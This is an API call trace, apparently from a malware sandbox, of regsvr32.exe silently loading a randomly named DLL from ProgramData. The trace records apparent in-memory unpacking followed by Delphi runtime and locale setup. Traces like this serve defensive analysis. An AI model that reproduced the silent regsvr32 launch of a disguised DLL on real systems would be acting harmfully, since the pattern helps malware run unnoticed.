[0085.328] GetStartupInfoW (in: lpStartupInfo=0xef8b4 | out: lpStartupInfo=0xef8b4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\regsvr32.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x5f5e100, hStdOutput=0x0, hStdError=0xef91c))
[0085.329] GetModuleHandleA (lpModuleName=0x0) returned 0xa40000
[0085.329] __set_app_type (_Type=0x2)
[0085.329] __p__fmode () returned 0x757a31f4
[0085.329] __p__commode () returned 0x757a31fc
[0085.329] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xa42873) returned 0x0
[0085.329] __wgetmainargs (in: _Argc=0xa443f8, _Argv=0xa44400, _Env=0xa443fc, _DoWildCard=0, _StartInfo=0xa4440c | out: _Argc=0xa443f8, _Argv=0xa44400, _Env=0xa443fc) returned 0
[0085.330] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1
[0085.330] NtSetInformationProcess (ProcessHandle=0xffffffff, ProcessInformationClass=0x22, ProcessInformation=0xeec2c, ProcessInformationLength=0x4) returned 0x0
[0085.330] lstrlenW (lpString="C:\\ProgramData\\xxx6000137xx\\marxvxinhhm64528113361.dll") returned 54
[0085.330] OleInitialize (pvReserved=0x0) returned 0x0
[0085.380] SetErrorMode (uMode=0x1) returned 0x0
[0085.380] _wsplitpath_s (in: _FullPath="C:\\ProgramData\\xxx6000137xx\\marxvxinhhm64528113361.dll", _Drive=0x0, _DriveCount=0x0, _Dir=0x0, _DirCount=0x0, _Filename=0x0, _FilenameCount=0x0, _Ext=0xee610, _ExtCount=0x100 | out: _Drive=0x0, _Dir=0x0, _Filename=0x0, _Ext=".dll") returned 0x0
[0085.381] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey=".dll", ulOptions=0x0, samDesired=0x1, phkResult=0xee40c | out: phkResult=0xee40c*=0x92) returned 0x0
[0085.381] RegQueryValueW (in: hKey=0x92, lpSubKey=0x0, lpData=0xee410, lpcbData=0xee408 | out: lpData="dllfile", lpcbData=0xee408) returned 0x0
[0085.381] RegCloseKey (hKey=0x92) returned 0x0
[0085.381] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey="dllfile", ulOptions=0x0, samDesired=0x1, phkResult=0xee40c | out: phkResult=0xee40c*=0x92) returned 0x0
[0085.381] RegOpenKeyExW (in: hKey=0x92, lpSubKey="AutoRegister", ulOptions=0x0, samDesired=0x1, phkResult=0xee400 | out: phkResult=0xee400*=0x0) returned 0x2
[0085.381] RegCloseKey (hKey=0x92) returned 0x0
[0085.382] SetErrorMode (uMode=0x1) returned 0x1
[0085.382] LoadLibraryExW (lpLibFileName="C:\\ProgramData\\xxx6000137xx\\marxvxinhhm64528113361.dll", hFile=0x0, dwFlags=0x8)
[0085.408] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0085.408] GetProcAddress (hModule=0x75370000, lpProcName="VirtualAlloc") returned 0x753c2fb6
[0085.408] GetProcAddress (hModule=0x75370000, lpProcName="VirtualFree") returned 0x753c1da4
[0085.408] GetProcAddress (hModule=0x75370000, lpProcName="VirtualProtect") returned 0x753b2341
[0085.408] VirtualAlloc (lpAddress=0x0, dwSize=0x1800, flAllocationType=0x1000, flProtect=0x4) returned 0x90000
[0085.408] VirtualAlloc (lpAddress=0x0, dwSize=0xe990e, flAllocationType=0x1000, flProtect=0x4) returned 0x7b0000
[0085.651] VirtualFree (lpAddress=0x7b0000, dwSize=0x0, dwFreeType=0x8000) returned 1
[0085.660] VirtualAlloc (lpAddress=0x0, dwSize=0xd0e, flAllocationType=0x1000, flProtect=0x4) returned 0x160000
[0085.661] VirtualFree (lpAddress=0x160000, dwSize=0x0, dwFreeType=0x8000) returned 1
[0085.661] VirtualAlloc (lpAddress=0x0, dwSize=0x450e, flAllocationType=0x1000, flProtect=0x4) returned 0x160000
[0085.662] VirtualFree (lpAddress=0x160000, dwSize=0x0, dwFreeType=0x8000) returned 1
[0085.663] VirtualAlloc (lpAddress=0x0, dwSize=0x1b0e, flAllocationType=0x1000, flProtect=0x4) returned 0x160000
[0085.663] VirtualFree (lpAddress=0x160000, dwSize=0x0, dwFreeType=0x8000) returned 1
[0085.664] VirtualAlloc (lpAddress=0x0, dwSize=0x50e, flAllocationType=0x1000, flProtect=0x4) returned 0x160000
[0085.664] VirtualFree (lpAddress=0x160000, dwSize=0x0, dwFreeType=0x8000) returned 1
[0085.664] VirtualAlloc (lpAddress=0x0, dwSize=0x1610e, flAllocationType=0x1000, flProtect=0x4) returned 0x160000
[0085.727] SetThreadLocale (Locale=0x400) returned 1
[0085.728] GetVersion () returned 0x1db10106
[0085.728] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x75370000
[0085.728] GetProcAddress (hModule=0x75370000, lpProcName="GetThreadPreferredUILanguages") returned 0x753b22d7
[0085.728] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x75370000
[0085.728] GetProcAddress (hModule=0x75370000, lpProcName="SetThreadPreferredUILanguages") returned 0x753ae627
[0085.729] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x75370000
[0085.729] GetProcAddress (hModule=0x75370000, lpProcName="GetThreadUILanguage") returned 0x753aae42
[0085.729] GetSystemInfo (in: lpSystemInfo=0xee474 | out: lpSystemInfo=0xee474*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03))
[0085.729] GetCommandLineW () returned="\"C:\\Windows\\System32\\regsvr32.exe\" /s \"C:\\ProgramData\\xxx6000137xx\\marxvxinhhm64528113361.dll\""
[0085.729] GetStartupInfoW (in: lpStartupInfo=0xee450 | out: lpStartupInfo=0xee450*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\regsvr32.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x4, hStdOutput=0x24a, hStdError=0x1f80))
[0085.729] GetACP () returned 0x4e4
[0085.729] GetCurrentThreadId () returned 0xf10
[0085.729] GetVersion () returned 0x1db10106
[0085.729] GetVersionExW (in: lpVersionInformation=0xee394*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xee3e0, dwMinorVersion=0xee3e0, dwBuildNumber=0x1f2b50, dwPlatformId=0xee444, szCSDVersion="\xfa22\x76f7\x70f2\x76f7\x6054\x76f6\x9582\x7532\xffff\xffff\x25") | out: lpVersionInformation=0xee394*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0085.729] GetModuleFileNameW (in: hModule=0x690000, lpFilename=0xec254, nSize=0x20a | out: lpFilename="C:\\ProgramData\\xxx6000137xx\\marxvxinhhm64528113361.dll" (normalized: "c:\\programdata\\xxx6000137xx\\marxvxinhhm64528113361.dll")) returned 0x36
[0085.729] GetModuleFileNameW (in: hModule=0x0, lpFilename=0xec03e, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\regsvr32.exe" (normalized: "c:\\windows\\system32\\regsvr32.exe")) returned 0x20
[0085.729] VirtualAlloc (lpAddress=0x0, dwSize=0x13fff0, flAllocationType=0x1000, flProtect=0x4) returned 0x7b0000
[0085.730] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Embarcadero\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0xebfb8 | out: phkResult=0xebfb8*=0x0) returned 0x2
[0085.730] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Embarcadero\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0xebfb8 | out: phkResult=0xebfb8*=0x0) returned 0x2
[0085.730] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\CodeGear\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0xebfb8 | out: phkResult=0xebfb8*=0x0) returned 0x2
[0085.731] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\CodeGear\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0xebfb8 | out: phkResult=0xebfb8*=0x0) returned 0x2
[0085.731] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0xebfb8 | out: phkResult=0xebfb8*=0x0) returned 0x2
[0085.731] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Delphi\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0xebfb8 | out: phkResult=0xebfb8*=0x0) returned 0x2
[0085.731] GetUserDefaultUILanguage () returned 0x409
[0085.731] IsValidLocale (Locale=0x409, dwFlags=0x2) returned 1
[0085.731] GetThreadUILanguage () returned 0xe0409
[0085.731] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0xebf94, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0xebfbc | out: pulNumLanguages=0xebf94, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0xebfbc) returned 1
[0085.731] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0xebf94, pwszLanguagesBuffer=0x8d3350, pcchLanguagesBuffer=0xebfbc | out: pulNumLanguages=0xebf94, pwszLanguagesBuffer=0x8d3350, pcchLanguagesBuffer=0xebfbc) returned 1
[0085.731] FindFirstFileW (in: lpFileName="C:\\ProgramData\\xxx6000137xx\\marxvxinhhm64528113361.en-US", lpFindFileData=0xebd64 | out: lpFindFileData=0xebd64) returned 0xffffffff
[0085.732] FindFirstFileW (in: lpFileName="C:\\ProgramData\\xxx6000137xx\\marxvxinhhm64528113361.en", lpFindFileData=0xebd64 | out: lpFindFileData=0xebd64) returned 0xffffffff
[0085.732] GetUserDefaultUILanguage () returned 0x409
[0085.732] GetLocaleInfoW (in: Locale=0x409, LCType=0x3, lpLCData=0xebfd8, cchData=4 | out: lpLCData="ENU") returned 4
[0085.732] FindFirstFileW (in: lpFileName="C:\\ProgramData\\xxx6000137xx\\marxvxinhhm64528113361.ENU", lpFindFileData=0xebd64 | out: lpFindFileData=0xebd64) returned 0xffffffff
[0085.733] FindFirstFileW (in: lpFileName="C:\\ProgramData\\xxx6000137xx\\marxvxinhhm64528113361.EN", lpFindFileData=0xebd64 | out: lpFindFileData=0xebd64) returned 0xffffffff
[0085.733] LoadStringW (in: hInstance=0x690000, uID=0xffcc, lpBuffer=0xec484, cchBufferMax=4096 | out: lpBuffer="Method called on disposed object") returned 0x20
[0085.733] LoadStringW (in: hInstance=0x690000, uID=0xffcb, lpBuffer=0xec484, cchBufferMax=4096 | out: lpBuffer="Feature not implemented") returned 0x17
[0085.733] LoadStringW (in: hInstance=0x690000, uID=0xffca, lpBuffer=0xec484, cchBufferMax=4096 | out: lpBuffer="Monitor support function not initialized") returned 0x28
[0085.733] LoadStringW (in: hInstance=0x690000, uID=0xffc9, lpBuffer=0xec484, cchBufferMax=4096 | out: lpBuffer="Object lock not owned") returned 0x15
[0085.733] LoadStringW (in: hInstance=0x690000, uID=0xffc8, lpBuffer=0xec484, cchBufferMax=4096 | out: lpBuffer="Exception in safecall method") returned 0x1c
[0085.733] LoadStringW (in: hInstance=0x690000, uID=0xffc7, lpBuffer=0xec484, cchBufferMax=4096 | out: lpBuffer="Interface not supported") returned 0x17
[0085.733] LoadStringW (in: hInstance=0x690000, uID=0xffc5, lpBuffer=0xec484, cchBufferMax=4096 | out: lpBuffer="External exception %x") returned 0x15
[0085.733] LoadStringW (in: hInstance=0x690000, uID=0xffc6, lpBuffer=0xec484, cchBufferMax=4096 | out: lpBuffer="Assertion failed") returned 0x10
[0085.733] LoadStringW (in: hInstance=0x690000, uID=0xffd4, lpBuffer=0xec484, cchBufferMax=4096 | out: lpBuffer="Variant or safe array index out of bounds") returned 0x29
[0085.733] LoadStringW (in: hInstance=0x690000, uID=0xffc1, lpBuffer=0xec484, cchBufferMax=4096 | out: lpBuffer="Invalid argument") returned 0x10
[0085.733] LoadStringW (in: hInstance=0x690000, uID=0xffd3, lpBuffer=0xec484, cchBufferMax=4096 | out: lpBuffer="Error creating variant or safe array") returned 0x24
[0085.733] LoadStringW (in: hInstance=0x690000, uID=0xffee, lpBuffer=0xec484, cchBufferMax=4096 | out: lpBuffer="Variant method calls not supported") returned 0x22
[0085.733] LoadStringW (in: hInstance=0x690000, uID=0xffd7, lpBuffer=0xec484, cchBufferMax=4096 | out: lpBuffer="Invalid variant operation") returned 0x19
[0085.734] LoadStringW (in: hInstance=0x690000, uID=0xffd6, lpBuffer=0xec484, cchBufferMax=4096 | out: lpBuffer="Invalid variant type conversion") returned 0x1f
[0085.734] LoadStringW (in: hInstance=0x690000, uID=0xffe7, lpBuffer=0xec484, cchBufferMax=4096 | out: lpBuffer="Stack overflow") returned 0xe
[0085.734] LoadStringW (in: hInstance=0x690000, uID=0xffe8, lpBuffer=0xec484, cchBufferMax=4096 | out: lpBuffer="Control-C hit") returned 0xd
[0085.734] LoadStringW (in: hInstance=0x690000, uID=0xffe9, lpBuffer=0xec484, cchBufferMax=4096 | out: lpBuffer="Privileged instruction") returned 0x16
[0085.734] LoadStringW (in: hInstance=0x690000, uID=0xffe6, lpBuffer=0xec484, cchBufferMax=4096 | out: lpBuffer="Access violation") returned 0x10
[0085.734] LoadStringW (in: hInstance=0x690000, uID=0xffe4, lpBuffer=0xec484, cchBufferMax=4096 | out: lpBuffer="Invalid class typecast") returned 0x16
[0085.734] LoadStringW (in: hInstance=0x690000, uID=0xffe2, lpBuffer=0xec484, cchBufferMax=4096 | out: lpBuffer="Floating point underflow") returned 0x18
[0085.734] LoadStringW (in: hInstance=0x690000, uID=0xffe1, lpBuffer=0xec484, cchBufferMax=4096 | out: lpBuffer="Floating point overflow") returned 0x17
[0085.734] LoadStringW (in: hInstance=0x690000, uID=0xffe0, lpBuffer=0xec484, cchBufferMax=4096 | out: lpBuffer="Floating point division by zero") returned 0x1f
[0085.734] LoadStringW (in: hInstance=0x690000, uID=0xffff, lpBuffer=0xec484, cchBufferMax=4096 | out: lpBuffer="Invalid floating point operation") returned 0x20
[0085.734] LoadStringW (in: hInstance=0x690000, uID=0xfffe, lpBuffer=0xec484, cchBufferMax=4096 | out: lpBuffer="Integer overflow") returned 0x10
[0085.734] LoadStringW (in: hInstance=0x690000, uID=0xfffd, lpBuffer=0xec484, cchBufferMax=4096 | out: lpBuffer="Range check error") returned 0x11
[0085.734] LoadStringW (in: hInstance=0x690000, uID=0xfffc, lpBuffer=0xec484, cchBufferMax=4096 | out: lpBuffer="Division by zero") returned 0x10
[0085.734] LoadStringW (in: hInstance=0x690000, uID=0xfff5, lpBuffer=0xec47c, cchBufferMax=4096 | out: lpBuffer="Out of memory") returned 0xd
[0085.734] LoadStringW (in: hInstance=0x690000, uID=0xffe3, lpBuffer=0xec47c, cchBufferMax=4096 | out: lpBuffer="Invalid pointer operation") returned 0x19
[0085.734] GetVersionExW (in: lpVersionInformation=0xee390*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0xee390*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0085.734] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x75370000
[0085.735] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x1f9338
[0085.735] GetProcAddress (hModule=0x75370000, lpProcName="GetNativeSystemInfo") returned 0x753abe77
[0085.735] GetNativeSystemInfo (in: lpSystemInfo=0xee36c | out: lpSystemInfo=0xee36c*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03))
[0085.735] LoadStringW (in: hInstance=0x690000, uID=0xff5b, lpBuffer=0xec354, cchBufferMax=4096 | out: lpBuffer="Windows") returned 0x7
[0085.735] LoadStringW (in: hInstance=0x690000, uID=0xff5e, lpBuffer=0xec354, cchBufferMax=4096 | out: lpBuffer="Windows 7") returned 0x9
[0085.735] LoadStringW (in: hInstance=0x690000, uID=0xfffb, lpBuffer=0xec474, cchBufferMax=4096 | out: lpBuffer="Invalid numeric input") returned 0x15
[0085.735] LoadStringW (in: hInstance=0x690000, uID=0xfffa, lpBuffer=0xec474, cchBufferMax=4096 | out: lpBuffer="Disk full") returned 0x9
[0085.735] LoadStringW (in: hInstance=0x690000, uID=0xfff9, lpBuffer=0xec474, cchBufferMax=4096 | out: lpBuffer="Read beyond end of file") returned 0x17
[0085.735] LoadStringW (in: hInstance=0x690000, uID=0xfff8, lpBuffer=0xec474, cchBufferMax=4096 | out: lpBuffer="File access denied") returned 0x12
[0085.735] LoadStringW (in: hInstance=0x690000, uID=0xfff7, lpBuffer=0xec474, cchBufferMax=4096 | out: lpBuffer="Too many open files") returned 0x13
[0085.735] LoadStringW (in: hInstance=0x690000, uID=0xff8c, lpBuffer=0xec474, cchBufferMax=4096 | out: lpBuffer="Invalid file name - %s") returned 0x16
[0085.735] LoadStringW (in: hInstance=0x690000, uID=0xff6c, lpBuffer=0xec474, cchBufferMax=4096 | out: lpBuffer="The specified file was not found") returned 0x20
[0085.735] GetVersionExW (in: lpVersionInformation=0xee384*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x10000, dwMinorVersion=0x5e030006, dwBuildNumber=0x11c, dwPlatformId=0x6, szCSDVersion="\x01") | out: lpVersionInformation=0xee384*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0085.735] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x75370000
[0085.735] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetDiskFreeSpaceExW", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19
[0085.736] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetDiskFreeSpaceExW", cchWideChar=19, lpMultiByteStr=0x8a80dc, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetDiskFreeSpaceExW", lpUsedDefaultChar=0x0) returned 19
[0085.736] GetProcAddress (hModule=0x75370000, lpProcName="GetDiskFreeSpaceExW") returned 0x753ade40
[0085.736] GetModuleFileNameW (in: hModule=0x0, lpFilename=0xee25a, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\regsvr32.exe" (normalized: "c:\\windows\\system32\\regsvr32.exe")) returned 0x20
[0085.736] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Embarcadero\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0xee468 | out: phkResult=0xee468*=0x0) returned 0x2
[0085.736] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Embarcadero\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0xee468 | out: phkResult=0xee468*=0x0) returned 0x2
[0085.736] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\CodeGear\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0xee468 | out: phkResult=0xee468*=0x0) returned 0x2
[0085.736] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\CodeGear\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0xee468 | out: phkResult=0xee468*=0x0) returned 0x2
[0085.736] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0xee468 | out: phkResult=0xee468*=0x0) returned 0x2
[0085.736] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Delphi\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0xee468 | out: phkResult=0xee468*=0x0) returned 0x2
[0085.736] GetThreadLocale () returned 0x409
[0085.736] GetCPInfo (in: CodePage=0x0, lpCPInfo=0xee3a0 | out: lpCPInfo=0xee3a0) returned 1
[0085.736] IsValidLocale (Locale=0x409, dwFlags=0x1) returned 1
[0085.736] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x75370000
[0085.737] GetProcAddress (hModule=0x75370000, lpProcName="GetLogicalProcessorInformation") returned 0x753a2004
[0085.737] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x75370000
[0085.737] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x1f9348
[0085.737] GetProcAddress (hModule=0x75370000, lpProcName="GetLogicalProcessorInformation") returned 0x753a2004
[0085.737] GetLogicalProcessorInformation (in: Buffer=0x0, ReturnedLength=0xee2f8 | out: Buffer=0x0, ReturnedLength=0xee2f8) returned 0
[0085.737] GetLastError () returned 0x7a
[0085.737] GetLogicalProcessorInformation (in: Buffer=0x8999d0, ReturnedLength=0xee2f8 | out: Buffer=0x8999d0, ReturnedLength=0xee2f8) returned 1
[0085.737] GetCurrentThreadId () returned 0xf10
[0085.737] GetCurrentThreadId () returned 0xf10
[0085.737] GetLocaleInfoW (in: Locale=0x409, LCType=0x100b, lpLCData=0xee108, cchData=256 | out: lpLCData="2") returned 2
[0085.737] GetThreadLocale () returned 0x409
[0085.737] EnumCalendarInfoW (lpCalInfoEnumProc=0x6b5810, Locale=0x409, Calendar=0x2, CalType=0x4) returned 1
[0085.738] GetThreadLocale () returned 0x409
[0085.738] EnumCalendarInfoW (lpCalInfoEnumProc=0x6b58b4, Locale=0x409, Calendar=0x2, CalType=0x3) returned 1
[0085.738] GetCurrentThreadId () returned 0xf10
[0085.738] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0xee104, cchData=256 | out: lpLCData="Sun") returned 4
[0085.738] GetLocaleInfoW (in: Locale=0x409, LCType=0x30, lpLCData=0xee104, cchData=256 | out: lpLCData="Sunday") returned 7
[0085.738] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0xee104, cchData=256 | out: lpLCData="Mon") returned 4
[0085.738] GetLocaleInfoW (in: Locale=0x409, LCType=0x2a, lpLCData=0xee104, cchData=256 | out: lpLCData="Monday") returned 7
[0085.738] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0xee104, cchData=256 | out: lpLCData="Tue") returned 4
[0085.738] GetLocaleInfoW (in: Locale=0x409, LCType=0x2b, lpLCData=0xee104, cchData=256 | out: lpLCData="Tuesday") returned 8
[0085.738] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0xee104, cchData=256 | out: lpLCData="Wed") returned 4
[0085.738] GetLocaleInfoW (in: Locale=0x409, LCType=0x2c, lpLCData=0xee104, cchData=256 | out: lpLCData="Wednesday") returned 10
[0085.738] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0xee104, cchData=256 | out: lpLCData="Thu") returned 4
[0085.738] GetLocaleInfoW (in: Locale=0x409, LCType=0x2d, lpLCData=0xee104, cchData=256 | out: lpLCData="Thursday") returned 9
[0085.738] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0xee104, cchData=256 | out: lpLCData="Fri") returned 4
[0085.738] GetLocaleInfoW (in: Locale=0x409, LCType=0x2e, lpLCData=0xee104, cchData=256 | out: lpLCData="Friday") returned 7
[0085.738] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0xee104, cchData=256 | out: lpLCData="Sat") returned 4
[0085.738] GetLocaleInfoW (in: Locale=0x409, LCType=0x2f, lpLCData=0xee104, cchData=256 | out: lpLCData="Saturday") returned 9
[0085.738] GetLocaleInfoW (in: Locale=0x409, LCType=0x44, lpLCData=0xee108, cchData=256 | out: lpLCData="Jan") returned 4
[0085.738] GetLocaleInfoW (in: Locale=0x409, LCType=0x38, lpLCData=0xee108, cchData=256 | out: lpLCData="January") returned 8
[0085.738] GetLocaleInfoW (in: Locale=0x409, LCType=0x45, lpLCData=0xee108, cchData=256 | out: lpLCData="Feb") returned 4
[0085.739] GetLocaleInfoW (in: Locale=0x409, LCType=0x39, lpLCData=0xee108, cchData=256 | out: lpLCData="February") returned 9
[0085.739] GetLocaleInfoW (in: Locale=0x409, LCType=0x46, lpLCData=0xee108, cchData=256 | out: lpLCData="Mar") returned 4
[0085.739] GetLocaleInfoW (in: Locale=0x409, LCType=0x3a, lpLCData=0xee108, cchData=256 | out: lpLCData="March") returned 6
[0085.739] GetLocaleInfoW (in: Locale=0x409, LCType=0x47, lpLCData=0xee108, cchData=256 | out: lpLCData="Apr") returned 4
[0085.739] GetLocaleInfoW (in: Locale=0x409, LCType=0x3b, lpLCData=0xee108, cchData=256 | out: lpLCData="April") returned 6
[0085.739] GetLocaleInfoW (in: Locale=0x409, LCType=0x48, lpLCData=0xee108, cchData=256 | out: lpLCData="May") returned 4
[0085.739] GetLocaleInfoW (in: Locale=0x409, LCType=0x3c, lpLCData=0xee108, cchData=256 | out: lpLCData="May") returned 4
[0085.739] GetLocaleInfoW (in: Locale=0x409, LCType=0x49, lpLCData=0xee108, cchData=256 | out: lpLCData="Jun") returned 4
[0085.739] GetLocaleInfoW (in: Locale=0x409, LCType=0x3d, lpLCData=0xee108, cchData=256 | out: lpLCData="June") returned 5
[0085.739] GetLocaleInfoW (in: Locale=0x409, LCType=0x4a, lpLCData=0xee108, cchData=256 | out: lpLCData="Jul") returned 4
[0085.739] GetLocaleInfoW (in: Locale=0x409, LCType=0x3e, lpLCData=0xee108, cchData=256 | out: lpLCData="July") returned 5
[0085.739] GetLocaleInfoW (in: Locale=0x409, LCType=0x4b, lpLCData=0xee108, cchData=256 | out: lpLCData="Aug") returned 4
[0085.739] GetLocaleInfoW (in: Locale=0x409, LCType=0x3f, lpLCData=0xee108, cchData=256 | out: lpLCData="August") returned 7
[0085.739] GetLocaleInfoW (in: Locale=0x409, LCType=0x4c, lpLCData=0xee108, cchData=256 | out: lpLCData="Sep") returned 4
[0085.739] GetLocaleInfoW (in: Locale=0x409, LCType=0x40, lpLCData=0xee108, cchData=256 | out: lpLCData="September") returned 10
[0085.739] GetLocaleInfoW (in: Locale=0x409, LCType=0x4d, lpLCData=0xee108, cchData=256 | out: lpLCData="Oct") returned 4
[0085.739] GetLocaleInfoW (in: Locale=0x409, LCType=0x41, lpLCData=0xee108, cchData=256 | out: lpLCData="October") returned 8
[0085.739] GetLocaleInfoW (in: Locale=0x409, LCType=0x4e, lpLCData=0xee108, cchData=256 | out: lpLCData="Nov") returned 4
[0085.739] GetLocaleInfoW (in: Locale=0x409, LCType=0x42, lpLCData=0xee108, cchData=256 | out: lpLCData="November") returned 9
[0085.739] GetLocaleInfoW (in: Locale=0x409, LCType=0x4f, lpLCData=0xee108, cchData=256 | out: lpLCData="Dec") returned 4
[0085.739] GetLocaleInfoW (in: Locale=0x409, LCType=0x43, lpLCData=0xee108, cchData=256 | out: lpLCData="December") returned 9
[0085.739] GetLocaleInfoW (in: Locale=0x409, LCType=0x14, lpLCData=0xee158, cchData=256 | out: lpLCData="$") returned 2
[0085.739] GetLocaleInfoW (in: Locale=0x409, LCType=0x1b, lpLCData=0xee158, cchData=256 | out: lpLCData="0") returned 2
[0085.739] GetLocaleInfoW (in: Locale=0x409, LCType=0x1c, lpLCData=0xee158, cchData=256 | out: lpLCData="0") returned 2
[0085.739] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0xee350, cchData=2 | out: lpLCData=",") returned 2
[0085.739] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0xee350, cchData=2 | out: lpLCData=".") returned 2
[0085.739] GetLocaleInfoW (in: Locale=0x409, LCType=0x19, lpLCData=0xee158, cchData=256 | out: lpLCData="2") returned 2
[0085.739] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0xee350, cchData=2 | out: lpLCData="/") returned 2
[0085.739] GetLocaleInfoW (in: Locale=0x409, LCType=0x1f, lpLCData=0xee110, cchData=256 | out: lpLCData="M/d/yyyy") returned 9
[0085.739] GetLocaleInfoW (in: Locale=0x409, LCType=0x1009, lpLCData=0xee110, cchData=256 | out: lpLCData="1") returned 2
[0085.739] GetLocaleInfoW (in: Locale=0x409, LCType=0x20, lpLCData=0xee110, cchData=256 | out: lpLCData="dddd, MMMM dd, yyyy") returned 20
[0085.739] GetLocaleInfoW (in: Locale=0x409, LCType=0x1009, lpLCData=0xee110, cchData=256 | out: lpLCData="1") returned 2
[0085.739] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0xee350, cchData=2 | out: lpLCData=":") returned 2
